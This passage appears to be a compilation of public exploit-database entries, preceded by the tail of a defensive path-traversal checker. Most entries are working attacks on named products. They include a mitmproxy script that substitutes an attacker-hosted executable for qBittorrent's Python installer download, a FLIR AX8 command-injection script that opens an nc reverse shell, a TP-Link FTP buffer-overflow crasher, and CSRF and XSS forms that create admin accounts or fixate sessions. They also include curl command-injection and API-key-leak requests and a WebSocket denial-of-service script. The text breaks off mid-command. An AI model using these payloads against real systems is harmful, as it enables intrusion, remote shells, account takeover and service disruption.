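    be the root itself or sit below it. Symlinks are not followed here; a
    real servlet should compare canonical (realpath) forms as well.
    """
    root = posixpath.normpath(root)
    joined = posixpath.normpath(posixpath.join(root, rel_path.lstrip("/")))
    # The trailing "/" stops "/srv/webfilesys/docroot2" passing as inside the root.
    if joined != root and not joined.startswith(root + "/"):
        raise ValueError(f"relPath escapes the document root: {rel_path!r}")
    return joined


def is_traversal(rel_path, root=DOC_ROOT):
    """True when resolve_rel_path() would refuse the path."""
    try:
        resolve_rel_path(rel_path, root)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for candidate in ("/reports/q1", "/../../..", "reports/../../etc/passwd", "../docroot2/x"):
        print(f"{candidate!r:32} traversal={is_traversal(candidate)}")
```

Checking the normalised result rather than searching the input for `..` is what makes this robust: encoded, doubled or mid-path dot segments all collapse the same way, and anything that still ends up outside the root is rejected regardless of how it was spelled.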

ProConf 6.0 - Insecure Direct Object Reference (IDOR)

# Exploit Title: ProConf 6.0 - Insecure Direct Object Reference (IDOR)
# Date: 19/07/2018
# Exploit Author: S. M. Zia Ur Rashid, SC
# Author Contact: https://www.linkedin.com/in/ziaurrashid/
# Vendor Homepage: http://proconf.org & http://myproconf.org
# Version: <= 6.0
# Tested on: Windows
# CVE : CVE-2018-16606
# Patched Version: 6.1

# Description: In ProConf before 6.1, an Insecure Direct Object Reference
# (IDOR) allows any author to view and grab all submitted papers (Title and
# Abstract) and their authors' personal information (Name, Email,
# Organization, and Position) by changing the value of Paper ID (the pid
# parameter).

# PROOF-OF-CONCEPT

Step 1: Sign in as an author for a conference and submit a paper. You'll get
a paper ID.

Step 2: Now go to the paper details and change the value of Paper ID (param
pid=xxxx) to the nearest previous value to view other submitted papers and
their authors' information.

http://[host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx

qBittorrent 5.0.1 - MITM RCE

# Exploit Title: qBittorrent 5.0.1 MITM RCE
# Date: 01/02/2025
# Exploit Author: Jordan Sharp
# Vendor Homepage: https://github.com/qbittorrent/qBittorrent
# Software Link: https://www.qbittorrent.org/download
# Version: < 5.0.1
# Tested on: Windows 10
# CVE : CVE-2024-51774

Run the PoC on a MITM machine intercepting the host (for example with
mitmdump -s poc.py):

"""PoC exploit for CVE-2024-51774"""
from mitmproxy import http

# Python installer URLs qBittorrent fetches when asked to install Python.
targets = [
    "https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe",
    "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe",
    "https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe",
    "https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe",
    "https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi",
    "https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe",
    "https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe",
    "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe",
    "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe",
    "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe",
    "https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe",
    "https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe",
    "https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe",
    "https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi",
    "https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe",
]

# Attacker-hosted executable that replaces the installer.
SUBSTITUTE_URL = "http://192.168.50.2:6666/calc.exe"


def request(flow: http.HTTPFlow) -> None:
    """
    Inject any exe instead of a Python installer.
    """
    if flow.request.pretty_url in targets:
        flow.request.url = SUBSTITUTE_URL

GeoVision GV-ASManager 6.1.1.0 - CSRF

# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.1.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56901
# PoC: https://github.com/DRAGOWN/CVE-2024-56901

A Cross-Site Request Forgery (CSRF) vulnerability in the Geovision
GV-ASManager web application, version 6.1.1.0 or less, allows attackers to
create Admin accounts via a crafted GET request. This vulnerability is used
in a chain with CVE-2024-56903 for a successful CSRF attack.

Requirements

To perform a successful attack an attacker requires:
- GeoVision ASManager version 6.1.1.0 or less
- Network access to the GV-ASManager web application (in some cases it is publicly exposed)
- An administrator's interaction with an open session in the browser

Impact

The vulnerability can be leveraged to perform the following unauthorized
actions. An unauthorized account is able to:
- Turn the POST request into a GET request by leveraging the CVE-2024-56903 vulnerability.
- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account.
- Create a new administrator account on behalf of the legitimate administrator account.

After the successful attack, an attacker will be able to:
- Access resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Change data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras and access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform the CVE-2024-56902 attack to retrieve a cleartext password that can be reused in other digital assets of the organization.

The CSRF code (the form has no method attribute, so the browser submits it
as the GET request the chain relies on):

<html>
  <body>
    <!-- Set the target -->
    <form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf">
      <input type="hidden" name="action" value="UA&#95;SetCreateAccount" />
      <!-- Set Username -->
      <input type="hidden" name="id" value="Malicious" />
      <!-- Set Password -->
      <input type="hidden" name="password" value="Youarecracked999&#33;" />
      <!-- Set Email -->
      <input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" />
      <!-- Set privilege: 1 = Normal user, 2 = Administrator -->
      <input type="hidden" name="level" value="2" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS
# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
# Date: 25-01-2024
# Exploit Author: Rasime Ekici
# Vendor Homepage: www.softwareag.com
# Version: 10.15.0000-0092
# Tested on: 10.15.0000-0092
# CVE : CVE-2024-23733

Description:
The /WmAdmin/ and /invoke/vm.server/login login pages of the Integration
Server in Software AG webMethods 10.15.0 before Core Fix7 allow remote
attackers to reach the administration panel and discover the server hostname
and version information by sending an arbitrary username with a blank
password to the /WmAdmin/#/login/ URI.

Intercept the HTTP traffic, submit a dummy username with a blank password on
the login screen, and drop the request to "/admin/navigation/license" so
that you are not logged out. You are then able to see:
- the real hostname of the installed server
- version info
- administrative API endpoints

FLIR AX8 1.46.16 - Remote Command Injection

# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-37061

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3

urllib3.disable_warnings()


def banner():
    # The original ASCII-art logo did not survive extraction; only its text lines are kept.
    flirLogo = """
    FLIR AX8

    \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m
    \033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m
    FOR EDUCATIONAL PURPOSE ONLY.
    """
    return print('\033[1;94m{}\033[1;m'.format(flirLogo))


def pingWebInterface(RHOST, RPORT):
    url = 'http://{}:{}/login/'.format(RHOST, RPORT)
    response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
    # Checked outside the try block so that exit() is not swallowed by the except clause
    if response.status_code != 200:
        print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. '
              'Make sure the specified IP is correct.\033[1;m')
        exit()
    try:
        soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
        version = soup.find('p', id='login-title').string
        print('[INFO] {} detected.'.format(version))
    except Exception:
        print('[ERROR] Can\'t grab the device version...')


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
    url = 'http://{}:{}/res.php'.format(RHOST, RPORT)
    # URL-encoded command appended to the injectable id parameter; listener is LHOST:LPORT
    payload = ('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261'
               '%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff').format(LHOST, LPORT)
    data = 'action=alarm&id=2;{}'.format(payload)
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }
    try:
        print('[INFO] Executing reverse shell...')
        response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False)
        print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT))
        return
    except Exception as e:
        print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}'.format(LHOST, LPORT))
        return False


def main():
    banner()
    parser = argparse.ArgumentParser(
        description='Script PoC that exploits an unauthenticated remote command injection on FLIR AX8 devices.',
        add_help=False)
    parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True)
    parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
    parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
    parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
    args = parser.parse_args()

    pingWebInterface(args.RHOST, args.RPORT)
    execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
    main()
/*
 * Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
 * Date: 11/24/2024
 * Exploit Author: Mohamed Maatallah
 * Vendor Homepage: https://www.tp-link.com
 * Version: TT_V6.2.1021 (VN020-F3v(T))
 * Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
 * CVE: CVE-2024-12344
 * Category: Remote
 *
 * Description:
 * A critical buffer overflow and memory corruption vulnerability was discovered
 * in the TP-Link VN020-F3v(T) router's FTP server implementation. The
 * vulnerability stems from improper input validation of the USER command,
 * allowing unauthenticated attackers to trigger various failure modes through
 * payload size manipulation:
 *
 * 1. 1100 bytes  - Delayed crash (5-10 seconds)
 * 2. 1450 bytes  - Immediate crash
 * 3. >1450 bytes - Undefined behavior/state corruption
 *
 * Proof of Concept: (attached full c file)
 *
 * Compilation Instructions (Visual Studio):
 * ---------------------------------------
 * 1. Open Visual Studio
 * 2. Create a new C Console Application
 * 3. Add these additional dependencies to project settings:
 *    - ws2_32.lib
 *    - iphlpapi.lib
 * 4. Ensure Windows SDK is installed
 * 5. Set Platform Toolset to latest v143 or v142
 * 6. Compile in Release or Debug mode
 *
 * Disclaimer:
 * ----------
 * This proof of concept is for educational and research purposes only.
 * Unauthorized testing without explicit permission is unethical and illegal.
 */
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdint.h>
#include <windows.h>
#include <iphlpapi.h>
#include <icmpapi.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "iphlpapi.lib")

// Target configuration - MODIFY BEFORE TESTING
#define DEST_IP "192.168.1.1"       // IP of target FTP server
#define DEST_PORT 21                // Standard FTP port
#define PING_TIMEOUT_MS 1000        // Network timeout
#define MAX_PING_RETRIES 5          // Connectivity check attempts

// 1450: Instant
// 1100: Delayed
#define CRASH_STRING_LENGTH 1450    // Exact number of 'A's triggering instant crash
#define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2)  // USER + As + \r\n

typedef struct {
    HANDLE icmp_handle;
    IPAddr target_addr;
    LPVOID reply_buffer;
    DWORD reply_size;
} ping_context_t;

void log_msg(const char* prefix, const char* msg) {
    SYSTEMTIME st;
    GetLocalTime(&st);
    printf("[%02d:%02d:%02d] %s %s\n", st.wHour, st.wMinute, st.wSecond, prefix, msg);
}

void hexdump(const char* desc, const void* addr, const int len) {
    int i;
    unsigned char buff[17];
    const unsigned char* pc = (const unsigned char*)addr;

    if (desc != NULL)
        printf("%s:\n", desc);

    for (i = 0; i < len; i++) {
        if ((i % 16) == 0) {
            if (i != 0)
                printf("  %s\n", buff);
            printf("  %04x ", i);
        }
        printf(" %02x", pc[i]);
        if ((pc[i] < 0x20) || (pc[i] > 0x7e))
            buff[i % 16] = '.';
        else
            buff[i % 16] = pc[i];
        buff[(i % 16) + 1] = '\0';
    }

    while ((i % 16) != 0) {
        printf("   ");
        i++;
    }
    printf("  %s\n", buff);
}

BOOL check_connectivity(ping_context_t* ctx) {
    char send_buf[32] = { 0 };
    return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf),
                        NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0;
}

char* generate_exact_crash_payload() {
    char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1);  // +1 for null terminator
    if (!payload) {
        log_msg("[-]", "Failed to allocate payload memory");
        return NULL;
    }

    // Construct the exact payload that causes crash
    strcpy(payload, "USER ");                                // 5 bytes
    memset(payload + 5, 'A', CRASH_STRING_LENGTH);           // 1450 'A's
    memcpy(payload + 5 + CRASH_STRING_LENGTH, "\r\n", 2);   // 2 bytes
    payload[TOTAL_PAYLOAD_LENGTH] = '\0';

    char debug_msg[100];
    snprintf(debug_msg, sizeof(debug_msg),
             "Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)",
             TOTAL_PAYLOAD_LENGTH);
    log_msg("[*]", debug_msg);

    return payload;
}

BOOL send_crash_payload(const char* target_ip, uint16_t target_port) {
    WSADATA wsa;
    SOCKET sock = INVALID_SOCKET;
    struct sockaddr_in server;
    char server_reply[2048];
    int recv_size;
    ping_context_t ping_ctx = { 0 };
    BOOL success = FALSE;

    // Initialize Winsock
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        log_msg("[-]", "Winsock initialization failed");
        return FALSE;
    }

    // Setup ICMP for connectivity monitoring
    ping_ctx.icmp_handle = IcmpCreateFile();
    ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32;
    ping_ctx.reply_buffer = malloc(ping_ctx.reply_size);
    inet_pton(AF_INET, target_ip, &ping_ctx.target_addr);

    // Create socket
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        log_msg("[-]", "Socket creation failed");
        goto cleanup;
    }

    // Setup server address
    server.sin_family = AF_INET;
    server.sin_port = htons(target_port);
    inet_pton(AF_INET, target_ip, &server.sin_addr);

    // Connect to FTP server
    log_msg("[*]", "Connecting to target FTP server...");
    if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
        log_msg("[-]", "Connection failed");
        goto cleanup;
    }
    log_msg("[+]", "Connected successfully");

    // Verify initial connectivity
    if (!check_connectivity(&ping_ctx)) {
        log_msg("[-]", "No initial connectivity to target");
        goto cleanup;
    }

    // Receive banner
    if ((recv_size = recv(sock, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR) {
        log_msg("[-]", "Failed to receive banner");
        goto cleanup;
    }
    server_reply[recv_size] = '\0';
    log_msg("[*]", server_reply);

    // Generate and send the exact crash payload
    char* payload = generate_exact_crash_payload();
    if (!payload) {
        goto cleanup;
    }

    log_msg("[*]", "Sending crash payload...");
    hexdump("Payload hex dump (first 32 bytes)", payload, 32);

    if (send(sock, payload, TOTAL_PAYLOAD_LENGTH, 0) < 0) {
        log_msg("[-]", "Failed to send payload");
        free(payload);
        goto cleanup;
    }
    free(payload);
    log_msg("[+]", "Payload sent successfully");

    // Monitor for crash
    log_msg("[*]", "Monitoring target status...");
    Sleep(1000);  // Wait a bit for crash to take effect

    int failed_pings = 0;
    for (int i = 0; i < MAX_PING_RETRIES; i++) {
        if (!check_connectivity(&ping_ctx)) {
            failed_pings++;
            if (failed_pings >= 3) {
                log_msg("[+]", "Target crash confirmed!");
                success = TRUE;
                goto cleanup;
            }
        }
        Sleep(500);
    }
    log_msg("[-]", "Target appears to still be responsive");

cleanup:
    if (sock != INVALID_SOCKET) {
        closesocket(sock);
    }
    if (ping_ctx.icmp_handle != INVALID_HANDLE_VALUE) {
        IcmpCloseHandle(ping_ctx.icmp_handle);
    }
    if (ping_ctx.reply_buffer) {
        free(ping_ctx.reply_buffer);
    }
    WSACleanup();
    return success;
}

int main(void) {
    printf("\nTP-Link VN020 FTP Memory Corruption PoC\n");
    printf("---------------------------------------\n");
    printf("Target: %s:%d\n", DEST_IP, DEST_PORT);

    if (send_crash_payload(DEST_IP, DEST_PORT)) {
        printf("\nExploit successful - target crashed\n");
    } else {
        printf("\nExploit failed - target may be patched\n");
    }

    return 0;
}

Nagios Log Server 2024R1.3.1 - API Key Exposure

# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure
# Date: 2025-04-08
# Exploit Author: Seth Kraft, Alex Tisdale
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: Nagios Log Server 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-200, CWE-284, CWE-522
# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
# Type: Information Disclosure, Improper Access Control
# Exploit Risk: Critical

## Disclosure

For ethical research purposes only. Do not target systems without proper authorization.

## Description

An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.

## PoC

### Step 1: Access the vulnerable endpoint

```
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
```

## Sample Response

```json
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "test@example.com",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
```

CMU CERT/CC VINCE 2.0.6 - Stored XSS

# Exploit Title: CMU CERT/CC VINCE 2.0.6 - Stored XSS
# Vendor: Carnegie Mellon University
# Product web page: https://www.kb.cert.org/vince/
# Affected version: <=2.0.6

Summary: VINCE is the Vulnerability Information and Coordination Environment developed and used by the CERT Coordination Center to improve coordinated vulnerability disclosure. VINCE is a Python-based web platform.

Desc: The framework suffers from an authenticated stored cross-site scripting vulnerability. Input passed to the 'content' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in the context of an affected site.

Tested on: nginx/1.20.0
           Django 3.2.17

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5917
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5917.php

13.01.2023

--

$ curl -k https://kb.cert.org/vince/comm/post/CASE_NO \
> -H "Cookie: sessionid=xxxx" \
> -d 'content="><marquee>ZSL</marquee>%0A%0A&csrfmiddlewaretoken=xxx&paginate_by=10&reply_to=xxxxx'

ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning

# ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
#                   CBX Series (FLX Series)
#                   CBT Series
#                   CBV Series
#                   Firmware: <=9.3.4
# Advisory ID: ZSL-2025-5913
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5913.php
# CVE ID: CVE-2024-48849
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48849

: << "EOC"
Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features
a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and
INTEGRA™ building management solutions. ABB BACnet controllers are designed
for intelligent control of HVAC equipment such as central plant, boilers,
chillers, cooling towers, heat pump systems, air handling units (constant
volume, variable air volume, and multi-zone), rooftop units, electrical
systems such as lighting control, variable frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's
scalable, and modular, allowing you to control a diverse range of HVAC functions.

Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to an unauthenticated
WebSocket implementation that allows an attacker to execute the tcpdump command.
This command captures network traffic and filters it on serial ports 4855 and
4851, which are relevant to the device's services. The vulnerability can be
exploited in a loop to start multiple instances of tcpdump, leading to resource
exhaustion, denial of service (DoS) conditions, and potential data exfiltration.
The lack of authentication on the WebSocket interface allows unauthorized users
to continuously spawn new tcpdump processes, amplifying the attack's impact.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

21.04.2024
EOC

cat << "EOF"
                     P R O J E C T
              [ zeroscience ASCII banner ]
EOF

echo -ne "\n-------------------------------------------------------"
echo -ne "\nABB Cylon BACnet Building Controllers WebSocket Exploit"
echo -ne "\n-------------------------------------------------------\n"

if [ "$#" -ne 1 ]; then
    echo -ne "\nUsage: $0 [ipaddr]\n\n"
    exit
fi

IP=$1
TARGET="wss://$IP:443/ws"
PID=$!
echo "$PID"

STOP_SERVICE=`echo -e \
"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\
"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\
"\x64\x22\x3A\x22\x73\x74\x6F\x70\x22\x2C\x22\x70\x61"\
"\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65\x22"\
"\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65\x72"\
"\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A\x31"\
"\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30\x7D"\
"\x7D"` #stop tcpdump smartRouter capture

START_SERVICE=`echo -e \
"\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\
"\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\
"\x64\x22\x3A\x22\x73\x74\x61\x72\x74\x22\x2C\x22\x70"\
"\x61\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65"\
"\x22\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65"\
"\x72\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A"\
"\x31\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30"\
"\x7D\x7D"` #start tcpdump smartRouter capture

echo -e "\n[+] Sending JSONRPC => $START_SERVICE\n"
sleep 1
echo "$START_SERVICE"| websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v
sleep 2

echo -e "\n[+] Sending JSONRPC => $STOP_SERVICE\n"
sleep 1
echo "$STOP_SERVICE"| websocat -k -1 -B 251 -n "$TARGET" -v

echo -e "\n[*] Done"

<< "LOG"
$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager >log.txt; split -n 4 log.txt
$ cat /usr/local/aam/var/xaa
$ cat /usr/local/aam/var/xab
$ cat /usr/local/aam/var/xac
$ cat /usr/local/aam/var/xad
...
#Apr 21 23:12:51 kernel: device lo left promiscuous mode
#Apr 21 23:12:34 kernel: device lo entered promiscuous mode
#Apr 21 23:12:34 node[196]: ws connect
...
LOG

ABB Cylon Aspect 3.08.02 - PHP Session Fixation

# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability
# Advisory ID: ZSL-2025-5916
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php
# CVE ID: CVE-2024-11317
# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session
fixation, allowing an attacker to set a predefined PHPSESSID value. An
attacker can leverage an unauthenticated reflected XSS vulnerability in
jsonProxy.php to inject a crafted request, forcing the victim to adopt a
fixated session.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

                     P R O J E C T
              [ zeroscience ASCII banner ]

<html>
<body>
  <!-- Session ID in a cookie (Client-side script) OWASP Ref.: -->
  <form action="http://192.168.73.31/jsonProxy.php" method="GET">
    <input type="hidden" name="application" value="zeroscience" />
    <input type="hidden" name="query" value='<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>' />
    <input type="submit" value="Fix!" />
  </form>
</body>
</html>

ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)

# Exploit title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)
                    CBX Series (FLX Series)
                    CBT Series
                    CBV Series
                    Firmware: <=9.3.4

Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features
a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and
INTEGRA™ building management solutions. ABB BACnet controllers are designed
for intelligent control of HVAC equipment such as central plant, boilers,
chillers, cooling towers, heat pump systems, air handling units (constant
volume, variable air volume, and multi-zone), rooftop units, electrical
systems such as lighting control, variable frequency drives and metering.
The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented
connectivity and open integration for your building automation systems. It's
scalable, and modular, allowing you to control a diverse range of HVAC functions.

Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated
remote root code execution via the /api/users/password endpoint. An attacker
with valid credentials can inject arbitrary system commands by manipulating
the newPassword PUT parameter. The issue arises in users.js, where the new
password is hashed and improperly escaped before being passed to
ChildProcess.exec() within a usermod command, allowing out-of-band (blind)
command injection.

Tested on: Linux Kernel 5.4.27
           Linux Kernel 4.15.13
           NodeJS/8.4.0
           Express

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2025-5912
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5912.php
CVE ID: CVE-2024-48841
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841

21.04.2024

--

$ cat project

                     P R O J E C T
              [ zeroscience ASCII banner ]

$ curl -k -X PUT "https://7.3.3.1/api/users/password" \
> -H "Cookie: user_sid=xxx" \
> -H "Content-Type: application/json" \
> --data '{"oldPassword":"KAKA","newPassword":"ZULU`sleep 7`"}'

GeoVision GV-ASManager 6.1.0.0 - Broken Access Control

# Exploit Title: Broken Access Control in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56898
# PoC: https://github.com/DRAGOWN/CVE-2024-56898

Broken access control vulnerability in the Geovision GV-ASManager web application, version v6.1.0.0 or less.

Requirements

To perform a successful attack, an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (in some cases it is publicly accessible)
- Access to the Guest account (enabled by default), or any low-privilege account (Username: Guest; Password: <blank>)

Impact

The vulnerability can be leveraged to perform the following unauthorized actions. A low-privilege account that is not authorized to manage accounts is able to:
- Enable and disable any account.
- Create new accounts.
- Modify the privileges of any account.
- List accounts and their information.

After the escalation of privileges, an attacker will be able to:
- Access resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras and access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform the CVE-2024-56902 attack to retrieve cleartext passwords that can be reused against other digital assets of the organization.

cURL script:

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: [SET-TARGET]' \
    -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' \
    -H $'Sec-Ch-Ua-Mobile: ?0' \
    -H $'Sec-Ch-Ua-Platform: \"Linux\"' \
    -H $'Accept-Language: en-US,en;q=0.9' \
